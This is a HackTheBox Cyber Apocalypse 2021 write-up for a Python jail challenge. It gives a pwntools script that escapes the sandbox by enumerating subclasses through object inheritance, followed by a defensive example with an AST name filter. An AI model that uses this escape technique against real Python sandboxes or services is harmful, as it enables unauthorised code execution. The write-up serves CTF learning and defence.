HackTheBox Cyber Apocalypse CTF 2021: Build Yourself In

TL;DR

  • This is a Python jail challenge with restricted input.
  • Python object inheritance is not properly sandboxed.
  • Using ().__class__.__base__.__subclasses__() allows enumeration of all loaded classes.
  • Enumerating subclasses leaks powerful primitives such as file handlers and process execution.
  • Brute-force indexing over subclasses reveals usable gadgets.
  • The flag is recovered once the correct subclass is identified and abused.

Challenge Description

The extraterrestrials have upgraded their authentication system and now only they are able to pass. Did you manage to learn their language well enough in order to bypass the authorization check?

Solution

from pwn import *

context.log_level = 'warning'

# Expression that lists every class loaded in the remote interpreter
to_enumerate = '().__class__.__base__.__subclasses__()'

# Request one subclass index per connection and print what the jail returns
for i in range(100):
    io = remote("138.68.151.248", 30697)
    payload = '[print(x) for x in [[' + to_enumerate + '[' + str(i) + ']]]]'
    io.sendlineafter(b'>>>', payload.encode())
    print(io.recvline())
    io.close()

Flag: CHTB{n0_j4il_c4n_h4ndl3_m3!}
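
Seen from the defender's side, the weakness in the TL;DR can be reproduced and checked locally. The following is an added example, not code from the challenge or the original write-up: it assumes the jail execs input with builtins removed and only print exposed, and `JAIL_GLOBALS`, `violations` and `run_guarded` are hypothetical names. It shows that the class list is still reachable with no builtins, and that an AST check for underscore-prefixed names rejects the enumeration expression before it runs.

```python
import ast

# Assumption: the jail execs input with builtins removed and only print exposed.
JAIL_GLOBALS = {"__builtins__": None, "print": print}


def reachable_class_count() -> int:
    """Evaluate the write-up's enumeration expression inside the bare jail."""
    scope = dict(JAIL_GLOBALS)
    exec("n = ().__class__.__base__.__subclasses__().__len__()", scope)
    return scope["n"]


def violations(src: str) -> list:
    """Return the underscore-prefixed names and attributes used by src."""
    found = set()
    for node in ast.walk(ast.parse(src, mode="exec")):
        if isinstance(node, ast.Attribute) and node.attr.startswith("_"):
            found.add(node.attr)
        elif isinstance(node, ast.Name) and node.id.startswith("_"):
            found.add(node.id)
    return sorted(found)


def run_guarded(src: str) -> dict:
    """Exec src in the jail only if the AST check finds nothing to reject."""
    bad = violations(src)
    if bad:
        raise PermissionError("rejected names: " + ", ".join(bad))
    scope = dict(JAIL_GLOBALS)
    exec(src, scope)
    return scope


if __name__ == "__main__":
    print("classes reachable with no builtins:", reachable_class_count())
    print("harmless input ->", run_guarded("x = 1 + 1")["x"])
    try:
        run_guarded("().__class__.__base__.__subclasses__()")
    except PermissionError as err:
        print("enumeration input ->", err)
```

A name filter like this narrows what input can touch but is not a security boundary; untrusted code should run in a separate process with OS-level isolation.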